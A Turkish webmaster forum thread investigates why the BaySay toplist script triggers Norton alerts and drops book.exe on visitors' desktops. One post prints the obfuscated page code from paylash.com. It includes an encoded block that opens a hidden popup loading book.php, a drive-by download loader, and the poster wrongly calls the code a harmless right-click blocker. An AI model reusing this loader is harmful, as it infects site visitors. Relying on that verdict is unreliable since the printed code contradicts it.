BaySay Ne yapmaya çalışıyor

ya arkadaşlar baysay istatistikleri güzel diye topliste üye olalım dedim geçenlerde...

ekledim kodunu siteme ilk girişimle nortonun delirmesi biroldu direk virüs uyarısı verdi... bir kaç defa denedim sebebini baysay kodunu çıkarsım düzelti

desktop üzerine bir dosya eklemeyeçalışıyor ve extra pencere açıyor...

bugün norton olmayan makinedengirdim (evimden) başka bir sitede onun kodu var desktop a gene atmış dosyayı

acil çıkmam gerekti tarama yapmadan kapadım bilgisayarı...
sonuçta hiçbir şekilde bilgisayarımı açamadaım
güvenlikip adım adım onaylama hiçbirisi etki etmedi...
(başka bir siteden gelmiş olabilir ama ufak ihtimal)

bu sitenin admini buralarda bi yerdeyse kaldırsın o kodu lütfen script bu işe yaramıyorsa bile benim masatütüne dosya atmaya hakkınyok !
anasayfa kitlemekten daha kötü bu.. kodu kullanan sitelerde büyük ziyaretci kayıplarına sebeb verebilirsin
bütün hdd gitti allahtan yedeklerimi alabildim

herhalde tek başına bu kod neden olmamıştır bu duruma.çünkü senin başına gelenler başkalarınında başına gelse mutlaka seslerini çıkarır.ve bu uygulamaya son verirlerdi.
ama yinede buna bir çözüm getirilmesi gerekir.enazından böyle bişey yoksa bile yetkililerin bir açıklama yapması gerekir.

Gecende baba bi arkdas senin sitende virüs var program uyari veriyor demisti..

İnsanların bilgisayarlarına trojan vs yazılımlar yükleyen siteler var. Böylece hit sağlamayı hedefliyorlar. Ancak bu sadece şişirilmiş hittir. Siteyi sadece toplist vb. yerlerde üst sıralara çıkarır. Düne kadar hiti 300-500 olan siteler bu şekilde oldukça büyüdüler. Baysay ile ilgili bilgim yok ama bu şekilde hit almaya çalışan birkaç siteyi benimde Norton antivirüs programım engellemişti. Bu sitelerin isimlerini burada yazıp reklamlarını yapmak istemiyorum artık. Ama şuna emin olun ki ciddi, büyük insanlar bu tür hileli yollara başvurmazlar.

Bir Sitenin toplistte üst sıralarda olmasından daha önemli birşey var. O da kaliteli hit. Sitenize rızası olmadan giren insanlar hemen çıkarlar. Bu siteye birşey kazandırmaz.

Türkiye interneti bir dönem dialler larla uğraştı, şimdilerde trojanlarla vs. Ülkemiz interneti bu şekilde hiçbir yere gitmez. Piyasanın her alanında güzel projeler üretip bulunduğu sektörü geliştirmek yerine, insanlarımız bu sektörde de yine ticari anlayışlarını sahtekarlık üzerine kurmayı tercih ediyorlar. Bu kadar insanın için de insanlara faydalı siteler geliştiren webmaster var hala, bu arkadaşlara teşekkür ederim.

Şişirilmiş hitlerle gelenler, aynı şekilde giderler birgün.

Norton virüs uyarınısnı baysay yuzunden veriyo. Paylas mi ne bi site vardi. oradaki book.php ue baglanıyorsun. Bu forumlarda bu konu daha once de tartısılmıstı. Incelersen gorebilirsin.
Saygılar...

Merhaba arkadaşlar,

Bahsettiğiniz siteye girdim. Dediğiniz gibi bir zararlı kod enjeksiyonu var mı diye araştırmaya başladım. Kaynak kodlarını incelediğimde iç içe geçmiş javascript ve iframe ler ile gizli bir şekilde http://www.paylash.com/book.html adresinin çağırıldığını gördüm. Bu adere girdim ve sağ tıklamanın engelli olması ile karşılaştım. Kaynak kodlarını incelediğimde kodun basit bir kriptografi metodu ile şifrelendiğini gördüm. Bu durum karşısında iyice kıllandım tabiki.

KOD:

<HTML><HEAD><META http-equiv=Content-Type content="text/html; charset=windows-1254"><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%31%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F%73%3D%22%22%2C%69%63%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%32%3B%6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">QAPKRV%22NCLEWCEG? HctcQapkrv %3C>#//dwlavkml%22jr]lg*+ypgvwpl%22vpwg%7Fmlgppmp?jr]lg9dwlavkml%22jr]ao*+ypgvwpl%22dcnqg%7Fdwlavkml%22jr]of*g+yoca?lctkecvmp,wqgpCeglv,klfgzMd*%25Oca%25+#?/39kd%22*fmawoglv,cnn+ykd*gtglv,`wvvml??0~~*oca$$*gtglv,avpnIg{~~gtglv,ig{Amfg??;3+++ypgvwpl%22dcnqg%7F%7Fgnqgykd*g,ujkaj??1~~*oca$$*g,omfkdkgpq??0~~g,avpnIg{+++ypgvwpl%22dcnqg%7F%7F%7Fkd*lctkecvmp,crrLcog,klfgzMd*%25Klvgplgv%22Gzrnmpgp%25+??/3~~*lctkecvmp,wqgpCeglv,klfgzMd*%25OQKG%25+#?/3$$fmawoglv,cnn,nglevj#?2++ykd*fmawoglv,cnn+yoca?lctkecvmp,wqgpCeglv,klfgzMd*%25Oca%25+#?/39tgpqkml?rcpqgDnmcv*%252%25)lctkecvmp,wqgpCeglv,qw`qvp*lctkecvmp,wqgpCeglv,klfgzMd*%25OQKG%25+)7+.32+9kd*#oca$$tgpqkml%3C6+yfmawoglv,mlamlvgzvoglw?jr]ao%7Fgnqgyfmawoglv,mlomwqgfmul?jr]of9fmawoglv,mlig{fmul?jr]of%7F%7Fgnqg%22kd*fmawoglv,nc{gpq+yuklfmu,acrvwpgGtglvq*Gtglv,OMWQGFMUL~Gtglv,omfkdkgpq~Gtglv,IG[FMUL+9uklfmu,mlomwqgfmul?jr]of9uklfmu,mlig{fmul?jr]of%7Fgnqg%22kd*fmawoglv,egvGngoglv@{Kf$$#fmawoglv,cnn+yfmawoglv,mlamlvgzvoglw?jr]ao%7F%7F--//%3C>-QAPKRV%3C"));//--></SCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">JGCF%3C>VKVNG%3C`mmi>-VKVNG%3C>OGVC%22amlvglv? OQJVON%224,22,0:22,3004 %22lcog?EGLGPCVMP%3C>OGVC%22amlvglv?DpmlvRceg,Gfkvmp,Fmawoglv%22lcog?RpmeKf%3C>QAPKRV%3C%22%22tcp%22mRmrwr%22?%22uklfmu,apgcvgRmrwr*+9%22%22dwlavkml%22qjmuRmrwr*+%22y%22%22%22%22mRmrwr,fmawoglv,`mf{,kllgpJVON%22?%22 >m`hgav%22fcvc?`mmi,rjr%3C 9%22%22%22%22mRmrwr,qjmu*2.2.3.3.fmawoglv,`mf{+9%22%22%7F%22%22%22%22qjmuRmrwr*+>-QAPKRV%3C>-JGCF%3C"));//--></SCRIPT></HEAD>
<BODY><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">@MF[%3C>-@MF[%3C"));//--></SCRIPT></BODY></HTML>

Şifreyi çözmek için bazı ufak scriptler yazdım. İç içe geçmiş fonksiyonlar ve üst üste şifrelemeler yapılmıştı kodda. En sonunda kodun şifresini çözdüm ve bunun aptalca bir şekilde sadece sağ tıklamayı engelleyen bir script olduğunu anladım. Sayfanın çözülmüş hali:

<SCRIPT LANGUAGE="JavaScript"><!--
function hp_ne(){return true}onerror=hp_ne;function hp_cm(){return false}function hp_md(e){mac=navigator.userAgent.indexOf('Mac')!=-1;if (document.all){if(event.button==2||(mac&&(event.ctrlKey||event.keyCode==91))){return false}}else{if(e.which==3||(mac&&(e.modifiers==2||e.ctrlKey))){return false}}}if(navigator.appName.indexOf('Internet Explorer')==-1||(navigator.userAgent.indexOf('MSIE')!=-1&&document.all.length!=0)){if(document.all){mac=navigator.userAgent.indexOf('Mac')!=-1;version=parseFloat('0'+navigator.userAgent.substr(navigator.userAgent.indexOf('MSIE')+5),10);if(!mac&&version>4){document.oncontextmenu=hp_cm}else{document.onmousedown=hp_md;document.onkeydown=hp_md}}else if(document.layers){window.captureEvents(Event.MOUSEDOWN|Event.modifiers|Event.KEYDOWN);window.onmousedown=hp_md;window.onkeydown=hp_md}else if(document.getElementById&&!document.all){document.oncontextmenu=hp_cm}}//--></SCRIPT>

Sitede bir çok inceleme yaptım ama zararlı bir koda rastlayamadım. Nortonun yada diğer virüs programları bu şifrelenmiş sayfadan kıllanıp uyarı vermiş olabilirler. Ama hala anlayamadığım bir şey bu sitenin webmastrı bu olayı neden yaptı? İç içe scriptler, labirentler, şifreler ve en sonunda sağ tıklanması engellenmiş boş bir sayfa.

İlginç......

http://www.paylash.com/book.html

boş sayfa açtığı doğrudur ok.

ama desktop a book.exe atmasına ne deriz ?*
nortonun uyarı vermesine ?

Bilgisayar gitti yaw kesin ondanmı bilmiyorum mail atıcam sitesinin yetkilisine ve kaldırmazsa herhangi bir bilgide vermezse eğer aleyhinde propaganda başlatıcam.

1 kişi caysa yeter. siteye girişte kimse sitesine girişte norton vb. uyarısı göstermek istemez

Merhaba besiktaslim,

http://www.paylash.com/book.html adresine girdiğinde masa üstüne bir exe mi geliyor?

ewet birde hata !
c:\windows\desktop\bookm.exe
0x1000'den daha az hizalama ile hatalı bağlanmış .
hatayı giderin ve sonra yeniden bağlanın.

+ virüs uyarısı